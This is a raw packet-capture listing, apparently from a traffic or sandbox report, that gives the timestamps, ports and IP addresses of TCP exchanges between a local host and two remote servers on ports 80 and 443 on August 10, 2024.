Aug 10, 2024 16:12:23.393776894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393784046 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.393788099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393810987 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393817902 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.393817902 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.393821955 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393831968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.393841982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.393923044 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.394151926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394162893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394172907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394184113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394195080 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394228935 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.394252062 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.394331932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394344091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394352913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394364119 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394373894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394383907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394392014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.394395113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394407034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394417048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394428015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394438028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394448996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394459009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394460917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.394460917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.394460917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.394473076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.394484043 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.394514084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.394601107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.395235062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395246029 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395255089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395266056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395276070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395286083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395298004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395309925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395319939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395330906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395339012 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395349979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395360947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.395360947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.395360947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.395360947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.395365953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395381927 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395421982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.395421982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.395421982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.395848036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395859003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395962000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395972013 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395981073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.395987988 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.395992041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396003008 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396013021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396023035 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396028042 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.396034002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396044016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396049023 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.396054983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396064997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396075964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396086931 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396099091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396107912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396109104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.396109104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.396119118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.396157980 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.396157980 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.396267891 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.411739111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.411788940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.411812067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.411820889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.411830902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.411840916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.411855936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.411868095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.411878109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.411900997 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.411921978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.412008047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412019014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412029028 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412039995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412079096 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.412103891 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412115097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412126064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412137032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412161112 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.412177086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.412343979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412354946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412365913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412377119 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412388086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412416935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.412432909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.412524939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412535906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412547112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412559032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412569046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412592888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.412620068 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.412791014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412843943 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.412862062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412873030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412883997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412894964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412905931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412918091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412928104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.412935019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412945032 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.412952900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412960052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.412967920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412986040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.412991047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.413002968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.413031101 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.413289070 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413299084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413333893 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.413558006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413568974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413578987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413590908 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413599968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.413606882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413618088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413625002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.413634062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413644075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413652897 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.413662910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413670063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.413677931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413688898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413698912 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413707972 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.413716078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413727045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.413733959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.413741112 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.413769007 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414357901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414375067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414385080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414395094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414402962 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414412975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414418936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414427042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414441109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414447069 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414455891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414460897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414473057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414479971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414489031 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414495945 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414505005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414510965 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414520025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414526939 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414535999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414542913 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414551973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414558887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414567947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414575100 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414583921 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414591074 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414599895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414613008 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414619923 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414635897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414647102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414658070 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.414678097 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.414695978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415245056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415263891 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415275097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415286064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415292025 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415303946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415307999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415317059 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415326118 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415333033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415344000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415352106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415361881 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415374994 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415379047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415389061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415396929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415405989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415417910 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415425062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415436983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415447950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415452957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415463924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415468931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415479898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415491104 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415499926 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415510893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.415514946 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415537119 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.415551901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416158915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416168928 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416189909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416199923 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416205883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416217089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416224003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416233063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416244030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416249990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416259050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416269064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416275024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416291952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416299105 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416307926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416318893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416327000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416336060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416343927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416364908 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416796923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416807890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416816950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416826963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416836977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416845083 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416855097 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416861057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.416871071 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416893959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.416913986 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.416976929 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.416981936 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.417033911 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.417038918 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.417149067 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.417165995 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.417242050 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.417279959 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.417280912 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.417284012 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.417292118 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.417366028 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.417565107 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.417644978 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.417922020 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.417968988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.417979956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.417982101 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.417989016 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.417999029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.418011904 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.418030977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.418035984 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.418040037 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.418076992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.418078899 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.418078899 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.418586969 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.418646097 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.419363976 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.419418097 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.419456959 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.419940948 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.420293093 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.420348883 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.421073914 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.421159983 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.421250105 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.421320915 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.422173023 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.422229052 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.422306061 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.422374964 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.462291956 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.462357998 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.462481976 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.462553024 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.486247063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486255884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486265898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486273050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486351967 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.486351967 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.486666918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486675978 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486684084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486691952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486701012 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486711979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486726046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486743927 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486753941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486764908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486767054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.486767054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.486767054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.486773968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486784935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.486830950 CEST	49740	80	192.168.2.4	147.45.44.104
